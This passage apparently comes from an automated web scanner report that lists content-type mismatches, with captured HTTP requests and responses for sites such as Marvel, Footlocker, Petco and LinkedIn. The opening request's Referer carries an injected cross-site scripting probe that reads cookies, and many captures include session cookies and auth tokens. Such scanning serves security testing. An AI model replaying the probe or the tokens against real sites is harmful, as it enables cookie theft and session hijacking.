Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.toshibadirect.com/td/b2c/laptops.to?page=segHHO&d835f%27-alert(document.cookie)-%2782064d64928=1
Cookie: LivePersonID=LP i=16601155425835,d=1302186497

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Content-Location: http://sales.liveperson.net/lpWeb/default_ENT//hcpv/emt/mtag.js?site=53965383
Last-Modified: Sun, 13 Mar 2011 22:27:52 GMT
Accept-Ranges: bytes
ETag: "e0f243e4cde1cb1:2313"
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Date: Mon, 16 May 2011 10:41:47 GMT
Connection: close
Content-Length: 17291

eval((function(s){var a,c,e,i,j,o="",r,t=".....................................................................................................................$@^`~";for(i=0;i<s.length;i++){r=t+s[i][
...[SNIP]...

26.32. https://subscriptions.marvel.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   https://subscriptions.marvel.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement: The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: subscriptions.marvel.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=luue98b2qr99ivbgtvj7dm65i7; __utma=125179656.1793272522.1305510243.1305510243.1305510243.1; __utmc=125179656; __utmz=125179656.1305510243.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); split_nav_split=%2Fvar%2Fwww%2Fcom.marvel%2Fcom.marvel.frontend%2Fsites%2Fsubscriptions%2Fwww%2Fv3%2Ftemplates%2Fsub_nav.tmpl.htm

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:36:33 GMT
Server: Apache
Last-Modified: Thu, 16 Dec 2010 13:58:34 GMT
ETag: "386-73155680"
Accept-Ranges: bytes
Content-Length: 902
X-ServerNickName: Spidey
Keep-Alive: timeout=8, max=100
Connection: Keep-Alive
Content-Type: text/plain; charset=ISO-8859-1

............ .p.......(............. .................................................................................................KK..................<<..................................KK......TT
...[SNIP]...

26.33. http://trvlgrd.netmng.com/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://trvlgrd.netmng.com
Path:   /

Issue detail

The response contains the following Content-type statement: The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /?aid=088&u3=tgdirect&u4=000329&u8=us_direct&u9=Live; HTTP/1.1
Host: trvlgrd.netmng.com
Proxy-Connection: keep-alive
Referer: http://www.travelguard.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=488b3b2b-2198-4f8a-bafb-65af73521f16; evo5_TRAVELGUARD=8esftitq0xjod%7CsxLTMe9Cr3h0%2FM5E807%2Be%2FxaKSnX5sL6Ex9uB%2BcxkmmjhZhpXMGT2%2B6sv5T%2FSe2rLY6ooL%2F9ms3VJvHnlPiIrCo3BbiigP%2FySWpw7KNO1qJ6NVDtND6NhTQIYMUURFDdYIgaWTrA5n7dke1eLHP7Vct76LaBNe1NhLtDq%2BS4Imd0mq7GtsqV4DMAU%2Bi7Q7t%2F72nZ92tGWUu9rRN%2FWa%2B7gg%3D%3D; evo5=csmq4atf04cxa%7CJeuRJCb45V6uwY1xci0duejpNnUE%2BOmzqGMogMAW%2FNCOqkjFJeQTtSSwFM8SExogUBVq3aRXr6rOPcqNTmIC7EZV1nRS%2FfrPyazw99gyUAJXaI4v2Tf%2FYK%2FYCGNRiTDa8FIC%2F1rDdFnvxSKmwnP9%2FzSswr%2BFnZEedqWLNPmJOGiD%2BKTS14anDruAemPci57rfbGvxyPHPZwrhH9c2PC0R7Ymr8xiYKFUBnazCBzOBnL2qGd20SpExMUheTADl1d0TTjVbjvJQVia2%2BYow6VA05s7EZxex6vE%2BvmQgXxXWwR2mefK966%2FeFMgLbGnQsm5mGE5l%2BYsVCNKIKht%2BM7JXtn8nweceJeqZuNgJnNvN7mezkeiy1MIOhXMGKv%2BHUozybOtALE61aKDO%2BSoPj%2BhNGduTlw4jjewTANsUadm4eJQ75KAJA1KpHCSrfNDIRnHjMMAwYuzMxzJA7OiUPCwQbVx7hAHs0TdLiuv7ZzwK309%2BcMucPBVwOOwAyb9yajE

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:01:01 GMT
Server: Apache/2.2.9
P3P: policyref="http://trvlgrd.netmng.com/w3c/p3p.xml", CP="NOI DSP COR DEVa PSAa OUR BUS COM NAV"
Expires: Sat, 14 May 2011 02:01:01 GMT
Last-Modified: Sat, 14 May 2011 02:01:01 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: evo5_TRAVELGUARD=8esftitq0xjod%7CmNZFPeMSBHHrkJOK7jnRMSoysnLE0dmNWb03gtHOALTDPO03KkwNiJKZPHw8SLn%2BnB4GM7SPo%2FBtyvgOARF7dDLcKE9KDQ2PQCiDLFHSz8J%2FsYb90p%2BlZaFHUa5vkxGGYQH5nCtMJjZfyWszWumCyNsnhINbVVoSIcQACgRzEbI5Zn4wbCzShugNKw3Tukjdbq0WZw46L32YBeHc1ofejw%3D%3D; expires=Tue, 15-Nov-2011 02:01:01 GMT; path=/
Content-Length: 205
Connection: close
Content-Type: text/html; charset=UTF-8

var remarketing_script=document.createElement("SCRIPT");remarketing_script.src=document.location.protocol+"//a.netmng.com/?aid=088";document.getElementsByTagName("head")[0].appendChild(remarketing_scr
...[SNIP]...

26.34. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The response contains the following Content-type statement: The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /extern/login_status.php?api_key=LikeDetail&app_id=LikeDetail&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df3c2f0030%26origin%3Dhttp%253A%252F%252Fwww.petco.com%252Ff5f1f5674%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df164f97d0%26origin%3Dhttp%253A%252F%252Fwww.petco.com%252Ff5f1f5674%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df42e6f9a4%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df3e52e016%26origin%3Dhttp%253A%252F%252Fwww.petco.com%252Ff5f1f5674%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df42e6f9a4&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df1e4c4f9bc%26origin%3Dhttp%253A%252F%252Fwww.petco.com%252Ff5f1f5674%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df42e6f9a4&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df346e6536%26origin%3Dhttp%253A%252F%252Fwww.petco.com%252Ff5f1f5674%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df42e6f9a4&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.petco.com/?AID=10413444&PID=2537521&cm_mmc=CJ-_-CID-_-2537521-_-10413444
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.29.25
X-Cnection: close
Date: Mon, 16 May 2011 01:58:45 GMT
Content-Length: 22

Invalid Application ID

26.35. http://www.footlocker.com/images/common/coradiant/!crd_prm!.!cm

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.footlocker.com
Path:   /images/common/coradiant/!crd_prm!.!cm

Issue detail

The response contains the following Content-type statement: The response states that it contains plain text. However, it actually appears to contain a BMP image.

Request

GET /images/common/coradiant/!crd_prm!.!cm?crd_ver=0.9.5&crd_rnd=106884&crd_cnt=0.01&crd_tpb=1305510862694&crd_olt=18656 HTTP/1.1
Host: www.footlocker.com
Proxy-Connection: keep-alive
Referer: http://www.footlocker.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NST=2011%2D05%2D15%2020%3A43%3A37; TRACK_USER_P=31176371511204337200580613; DOTOMI_SESSION=1; CHOSEN_BANNER=2; CHOSEN_BANNER_ID=FS/$75; mbcc=AFC75D5D-C7E2-5D3D-AA90-829AA86D100E; SSLC=web07; USER_PROFILE=HSPEqM4qU3DrFgRRbE4xA41L%2FxlKfNqQFH82vg1uFDf78j9GgBKSVG72ux9P9BBD9TNotE%2FuTdY7%0ApgsOVdTPmuf5mHGkQdt%2Fp4QG7ekqXGW%2Bc0%2BRT5CrpIV02E6hdSX61Dc5kPpRmjrov7on6s6li5HE%0AlOQG5YDlPEHH39sa1pRrpC3F25gGPN%2B9AXbwHEZb7MdHE8MV1vwxbOmvVo1eIzUeLfk1WM7eU85U%0AI9k9nJhUP8QjAazzjzcfG7j8i%2FZcdDc6rIzc9KtfsknfcwMpBJgyU6MmKYeBzKCHNiF4nGiiNSnF%0AcO5qGOI%2F1ENBjQbjXaghymu5WCtRYmAA%2FyLJM6SorvFGpkVfhe2sQZVzu3Kglt%2BFhTm8qRZenVT4%0AVbKkKIGY%2BpNyEWDhq79vMwb2kdMXujxgmwUz; BROWSER_SESSION=ralquAXUBpcSoNO65%2FZbRPD%2FAJ%2F1qkUwimcu38BTWxf6OLJJhPFUS2qHovA0PKYQ68EfgqxTfvoM%0ANZstUyOpfmuQYhPsaDqR; TID=5555%2D37151120432137200525561%2D0; cmTPSet=Y; fcspersistslider_click_1=1; mbcs=FF749AA3-A7E6-5BAF-08D2-2754D53C08DB

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Fri, 09 Oct 2009 19:18:06 GMT
Accept-Ranges: bytes
Content-Length: 66
X-UA-Compatible: IE=EmulateIE7
P3P: policyref="http://www.footlocker.com/w3c/p3p.xml", CP="CAO CURo ADMo CONo DEVo PSAo PSDo IVAo IVDo HISo TELo OUR IND UNI NAV CNT INT ONL PUR STA"
Content-Type: text/plain
Date: Mon, 16 May 2011 02:01:06 GMT
Connection: close

BMB.......>...(...................................................

26.36. http://www.footlocker.com/ns/hp/css/images/FL_Collections_arrow_l.gif

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.footlocker.com
Path:   /ns/hp/css/images/FL_Collections_arrow_l.gif

Issue detail

The response contains the following Content-type statement: The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /ns/hp/css/images/FL_Collections_arrow_l.gif HTTP/1.1
Host: www.footlocker.com
Proxy-Connection: keep-alive
Referer: http://www.footlocker.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NST=2011%2D05%2D15%2020%3A43%3A37; TRACK_USER_P=31176371511204337200580613; DOTOMI_SESSION=1; CHOSEN_BANNER=2; CHOSEN_BANNER_ID=FS/$75; mbcc=AFC75D5D-C7E2-5D3D-AA90-829AA86D100E; SSLC=web07; USER_PROFILE=HSPEqM4qU3DrFgRRbE4xA41L%2FxlKfNqQFH82vg1uFDf78j9GgBKSVG72ux9P9BBD9TNotE%2FuTdY7%0ApgsOVdTPmuf5mHGkQdt%2Fp4QG7ekqXGW%2Bc0%2BRT5CrpIV02E6hdSX61Dc5kPpRmjrov7on6s6li5HE%0AlOQG5YDlPEHH39sa1pRrpC3F25gGPN%2B9AXbwHEZb7MdHE8MV1vwxbOmvVo1eIzUeLfk1WM7eU85U%0AI9k9nJhUP8QjAazzjzcfG7j8i%2FZcdDc6rIzc9KtfsknfcwMpBJgyU6MmKYeBzKCHNiF4nGiiNSnF%0AcO5qGOI%2F1ENBjQbjXaghymu5WCtRYmAA%2FyLJM6SorvFGpkVfhe2sQZVzu3Kglt%2BFhTm8qRZenVT4%0AVbKkKIGY%2BpNyEWDhq79vMwb2kdMXujxgmwUz; BROWSER_SESSION=ralquAXUBpcSoNO65%2FZbRPD%2FAJ%2F1qkUwimcu38BTWxf6OLJJhPFUS2qHovA0PKYQ68EfgqxTfvoM%0ANZstUyOpfmuQYhPsaDqR; TID=5555%2D37151120432137200525561%2D0; cmTPSet=Y; fcspersistslider_click_1=1; mbcs=FF749AA3-A7E6-5BAF-08D2-2754D53C08DB

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html; charset=iso-8859-1
Content-Length: 15
Vary: Accept-Encoding
Date: Mon, 16 May 2011 01:54:40 GMT
Connection: close

File not found.

26.37. https://www.footlocker.com/images/common/coradiant/!crd_prm!.!cm

Summary

Severity:   Information
Confidence:   Firm
Host:   https://www.footlocker.com
Path:   /images/common/coradiant/!crd_prm!.!cm

Issue detail

The response contains the following Content-type statement: The response states that it contains plain text. However, it actually appears to contain a BMP image.

Request

GET /images/common/coradiant/!crd_prm!.!cm?crd_ver=0.9.5&crd_rnd=972739&crd_cnt=0.01&crd_tpb=1305542016332&crd_olt=36042 HTTP/1.1
Host: www.footlocker.com
Connection: keep-alive
Referer: https://www.footlocker.com/account/default/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NST=2011%2D05%2D15%2020%3A43%3A37; TRACK_USER_P=31176371511204337200580613; DOTOMI_SESSION=1; CHOSEN_BANNER=2; CHOSEN_BANNER_ID=FS/$75; mbcc=AFC75D5D-C7E2-5D3D-AA90-829AA86D100E; cmTPSet=Y; fcspersistslider_click_1=1; NewRegistrant=Global Header Log In|Create an Account; cmRS=&t1=1305510865474&t2=1305510881356&t3=1305542003667&t4=1305510858114&lti=1305541986623&ln=&hr=javascript%3AopenLoginDialogForID%28top_welcome_login%2C%20null%2C%20null%2C%20function%28%29%20%7BupdateWelcome%28%29%7D%2C%20left%2C%20Global%20Header%2C%20Log%20In%20%2C%20true%2C%20true%29&fti=&fn=keywordSearch%3A0%3B&ac=&fd=&uer=&fu=&pi=Home&ho=rpt.footlocker.com/eluminate%3F&ci=90101910; SSLC=web%2D22; USER_PROFILE=XntuC2pOMw8w8TqaWwv8txAZg3tbL4suNoZYk2ue%2BcZCPaCpXlo0zVtTWyLZxHeLJwGNiJJ8YALe%0AYO52%2FFq1NwpjWMwAdfLllGlVw52wlVZ24kS1XMdjynDJqwwJVrBJnvYKVDQx8pEFQmhyo6rkfUCh%0AuX8X1xpdjCZRfBk6n2Agzm0b48f7gp53EAcSjAunU3Z56URE9kueJbMie5c5FV1U7rNaYjSTUWJg%0AAP8iyTOkqK7xRqZFX0XSoLRT1aJ56xYEUWxOMQM7la5asH%2Fm4h3DYB7XhTMIq5TrdkymeXTQyu6w%0AXzqTrkgK%2FsEXFAaaG25ejq3nEdx6F6aMXFAt3xymrlZM7VYtsbvD5xaCWOeF7axBlXO7cgp5pPa%2B%0AS8%2Buj29fG61R5Zr%2BAezd%2FmnMRHpH1MgMvvib; BROWSER_SESSION=MN%2FdSLylGWxLBCIZzBrmpSy1DSFrv5gOdYwlLrllaQpq9qQmDNUMWvbVHr1WftGLsNjTx1SDWn0j%0AUJTXkR6bEnpH1MgMvvib; TID=5555%2D37151120432137200525561%2D0

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Fri, 09 Oct 2009 19:18:06 GMT
Accept-Ranges: bytes
Content-Length: 66
X-UA-Compatible: IE=EmulateIE7
P3P: policyref="http://www.footlocker.com/w3c/p3p.xml", CP="CAO CURo ADMo CONo DEVo PSAo PSDo IVAo IVDo HISo TELo OUR IND UNI NAV CNT INT ONL PUR STA"
Content-Type: text/plain
Date: Mon, 16 May 2011 10:34:14 GMT
Connection: keep-alive

BMB.......>...(...................................................

26.38. http://www.linkedin.com/companyInsider

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.linkedin.com
Path:   /companyInsider

Issue detail

The response contains the following Content-type statement: The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /companyInsider?script&useBorder=no HTTP/1.1
Host: www.linkedin.com
Proxy-Connection: keep-alive
Referer: http://hire.jobvite.com/CompanyJobs/Careers.aspx?c=qlZ9Vfw8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: visit=G; bcookie="v=1&977d2a8e-45ea-4463-ac17-4a70c2eb7f42"; __qca=P0-831343408-1305412455203

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="CAO DSP COR CUR ADMi DEVi TAIi PSAi PSDi IVAi IVDi CONi OUR DELi SAMi UNRi PUBi OTRi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT POL PRE"
Expires: 0
Pragma: no-cache
Cache-control: no-cache, must-revalidate, max-age=0
Set-Cookie: leo_auth_token="GST:ZpPi5xXPu3wAUyoFmEPiRoFWLLVIhVePrpPMOWXudLVqstNpbsiqk6:1305541361:db371bb2e2f7f4cf87c484a45d4fcbd618246dc6"; Version=1; Max-Age=1799; Expires=Mon, 16-May-2011 10:52:40 GMT; Path=/
Set-Cookie: s_leo_auth_token="delete me"; Version=1; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: JSESSIONID="ajax:4068959828274013740"; Version=1; Path=/
Set-Cookie: lang="v=2&lang=en&c="; Version=1; Domain=linkedin.com; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 16 May 2011 10:22:41 GMT
Set-Cookie: NSC_MC_QH_MFP=ffffffffaf19965c45525d5f4f58455e445a4a42198c;expires=Mon, 16-May-2011 10:53:58 GMT;path=/;httponly
Content-Length: 12412

(function() {

// Set up LinkedIn Global Namespace
if (typeof(LinkedIn) == 'undefined') {
LinkedIn = {};
}

// Utility functions
function $(element) {
return (typeof element == 'string') ?

...[SNIP]...

26.39. https://www.orderhouse.com/Navigation/DisplayImage.aspx

Summary

Severity:   Information
Confidence:   Firm
Host:   https://www.orderhouse.com
Path:   /Navigation/DisplayImage.aspx

Issue detail

The response contains the following Content-type statement: The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.

Request

GET /Navigation/DisplayImage.aspx?ExtranetId=4&Type=Style_Logo HTTP/1.1
Host: www.orderhouse.com
Connection: keep-alive
Referer: https://www.orderhouse.com/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=234tuue5qomlrz2hyz2htr55; AccountType=; Pref=0; InitialEventId=24102329

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: image/jpeg
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 10:39:32 GMT
Content-Length: 3247

GIF89a..3..?.xxx......................mjCCC................TQTTT...&&&eee.......;9..............................999.............xv....&$..........QN....OL.HE...................a^.?=.........31.......
...[SNIP]...

26.40. http://www.petco.com/Handlers/Navigation/MegaMenuHandler.ashx

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.petco.com
Path:   /Handlers/Navigation/MegaMenuHandler.ashx

Issue detail

The response contains the following Content-type statement: The response states that it contains HTML. However, it actually appears to contain JSON.

Request

GET /Handlers/Navigation/MegaMenuHandler.ashx?a=getall&d=Sun%20May%2015%202011%2020:54:03%20GMT-0500%20(Central%20Daylight%20Time) HTTP/1.1
Host: www.petco.com
Proxy-Connection: keep-alive
Referer: http://www.petco.com/?AID=10413444&PID=2537521&cm_mmc=CJ-_-CID-_-2537521-_-10413444
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SL_Audience=423|Accelerated|92|7|0; SL_NV7=1|7; CMAVID=none; cmTPSet=Y; VisitHistorySession=; VisitHistory=LastDirectVisitDate=5/15/2011 6:42:24 PM; __utmz=215766422.1305510193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=215766422.2089458932.1305510193.1305510193.1305510193.1; __utmc=215766422; __utmv=215766422.SL_TS_Accelerated; __utmb=215766422.1.10.1305510193; mt.v=1.1314269718.1305510194589; RES_TRACKINGID=256672559073194; RES_SESSIONID=18709185067564; ResonanceSegment=2; SAVId=vid%3DjAZPvJCAn9TzbA3IqjIS0BXWEqTAhP6H%3Bnvid%3D1%3Bcvid%3D1%3Bplen%3D88%3Bpid%3D55d11a247d01f4c640b3ba5752e78685d%3Bpdx%3D88%3Bglen%3D243%3Bgid%3Df47055609695b3445280ada1f0e6c4c5%3Bgdx%3D89%3Bpt%3D61781%3B; MP=CJ=1&CJExpiry=6/19/2011 6:53:14 PM&CJ_AFFILIATEENTEREDDATE=5/15/2011 6:53:14 PM; Basket=AffiliateCJExpiryDate=6/19/2011 6:53:14 PM&PID=2537521&AID=10413444; SL_UVId=28F6BEFE806000C3; SASId=sid%3DVbDccytV4V9vowfK3PHnkrtcS6teMKbe%3Bcsid%3D1%3Bnsid%3D1%3Blut%3D1305510840147%3B; CoreAt=90002311=1|2|0|0|0|0|0|0|0|0|0|0|1|1305510189|14_16_18_20_21_22_25_|&

Response

HTTP/1.1 200 OK
P3P: CP="ALL DSP COR IVDi PSD PSA TELi TAIi ADM CUR CONi SAMi OUR IND PHY ONL UNI PUR COM NAV INT CNT PRE"
Location: http://www.petco.com:80/handlers/navigation/megamenuhandler.ashx?a=getall&d=sun%20may%2015%202011%2020:54:03%20gmt-0500%20(central%20daylight%20time)
Cache-Control: private
Content-Type: text/html; charset=utf-8
X-Strangeloop: ViewState,Compression
Vary: Accept-Encoding
Date: Mon, 16 May 2011 01:58:05 GMT
Connection: close
Set-Cookie: sltest=T; path=/; domain=petco.com.
Content-Length: 33122

[{"Content":"<div class=\"menu-col first\"><a href=\"http:\/\/www.petco.com\/N_22_149\/Dog-Apparel.aspx?Ns=P_DateCreated|1&CoreCat=MM_DogSupplies_Apparel\">Apparel<\/a><a href=\"http:\/\/www.petco.com
...[SNIP]...

26.41. http://www.res-x.com/ws/r2/Resonance.aspx

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.res-x.com
Path:   /ws/r2/Resonance.aspx

Issue detail

The response contains the following Content-type statement: The response states that it contains plain text. However, it actually appears to contain script.

Request

GET /ws/r2/Resonance.aspx?appid=HomeDepotCA01&tk=989860238041728&ss=223896591225639&sg=1&pg=307165416656062&bx=false&vr=2.69&ur=http%3A//www.homedepot.ca/webapp/wcs/stores/servlet/Home%3FstoreId%3D10051%26catalogId%3D10051%26langId%3D-15&plk=941965;921564;916034;940192;913068;900701;939123;938337;941444;943490;943548;943555;918895;914139;918498;924989;&rf= HTTP/1.1
Host: www.res-x.com
Proxy-Connection: keep-alive
Referer: http://www.homedepot.ca/webapp/wcs/stores/servlet/Home?storeId=10051&catalogId=10051&langId=-15
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=l0c4ty55mvnbbsewkm3fevbt; NSC_wjq-Rvbsboujof2=ffffffffc3a01e2f45525d5f4f58455e445a4a423660; NSC_wjq-Hspvq4=ffffffffc3a01e5345525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
P3P: CP="NOI DSP COR CUR PSA PSD OUR IND UNI"
Date: Mon, 16 May 2011 01:53:43 GMT
Content-Length: 10

<!-- //-->

26.42. http://www.restorationhardware.com/sitewide/includes/footer/email-sign-up.jsp

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.restorationhardware.com
Path:   /sitewide/includes/footer/email-sign-up.jsp

Issue detail

The response contains the following Content-type statement: The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /sitewide/includes/footer/email-sign-up.jsp HTTP/1.1
Host: www.restorationhardware.com
Proxy-Connection: keep-alive
Referer: http://www.restorationhardware.com/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/html, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=Wlhqnnp++zh3PRP2EtG-iQ**.782P2R9; __utmz=108701569.1305509985.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); promobanner=viewed; TS1c138a=b6e810b3b0486de55c7dc77610c783822efa223a5124b4964dd08831; fsr.s={"v":1,"rid":"1305509997099_983249","pv":1,"to":3,"c":"http://www.restorationhardware.com/","lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1305510793290}; __utma=108701569.1225998754.1305509985.1305509985.1305509985.1; __utmc=108701569; __utmb=108701569.2.10.1305509985; engagement=2; fsr.a=1305510805730

Response

HTTP/1.1 200 OK
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP05 (build: SVNTag=JBPAPP_4_2_0_GA_CP05 date=200810231548)/JBossWeb-2.0
X-ATG-Version: version=QVRHUGxhdGZvcm0vOS4yIFsgRFBTTGljZW5zZS8wIEIyQ0xpY2Vuc2UvMCAgXQ==
Content-Type: text/html;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 16 May 2011 01:53:26 GMT
Connection: close
Cache-Control: max-age=0
Expires: Mon, 16 May 2011 01:53:26 GMT
Content-Length: 2371

<h3 class="brand">Email Signup</h3>
<form action="/customer-service/footer-email-signup-thank-you.jsp" class="hasrequired" name="submitEmail" method="get" id="submitEmail"><input value="ISO-8859-1" ty
...[SNIP]...

26.43. https://www.restorationhardware.com/sitewide/includes/footer/email-sign-up.jsp

Summary

Severity:   Information
Confidence:   Firm
Host:   https://www.restorationhardware.com
Path:   /sitewide/includes/footer/email-sign-up.jsp

Issue detail

The response contains the following Content-type statement: The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /sitewide/includes/footer/email-sign-up.jsp HTTP/1.1
Host: www.restorationhardware.com
Connection: keep-alive
Referer: https://www.restorationhardware.com/my-account/sign-in.jsp?link=topnav_signin
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/html, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
